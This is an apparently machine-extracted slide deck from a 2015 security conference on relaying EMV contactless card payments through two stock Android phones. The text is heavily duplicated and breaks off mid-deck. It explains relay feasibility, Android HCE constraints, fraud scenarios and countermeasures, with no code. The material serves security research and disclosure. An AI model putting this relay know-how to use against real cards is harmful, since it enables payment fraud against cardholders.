Embed Size (px)
Citation preview
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
About us
Pepe VilaSecurity Consultant at EampYtw cgvwzq
httpvwzqnet
Main research interestsltJavaXSScriptgtandclient-side attacks
NFC security
Android internals
Dr Ricardo J RodrıguezSenior Security Researcher at ULE
tw RicardoJRodriguez
httpwwwricardojrodriguezes
Main research interestsSecuritysafety modelling andanalysis of ICS
Advanced malware analysis
NFC security
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 2 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 3 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
About us
Pepe VilaSecurity Consultant at EampYtw cgvwzq
httpvwzqnet
Main research interestsltJavaXSScriptgtandclient-side attacks
NFC security
Android internals
Dr Ricardo J RodrıguezSenior Security Researcher at ULE
tw RicardoJRodriguez
httpwwwricardojrodriguezes
Main research interestsSecuritysafety modelling andanalysis of ICS
Advanced malware analysis
NFC security
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 2 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 3 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
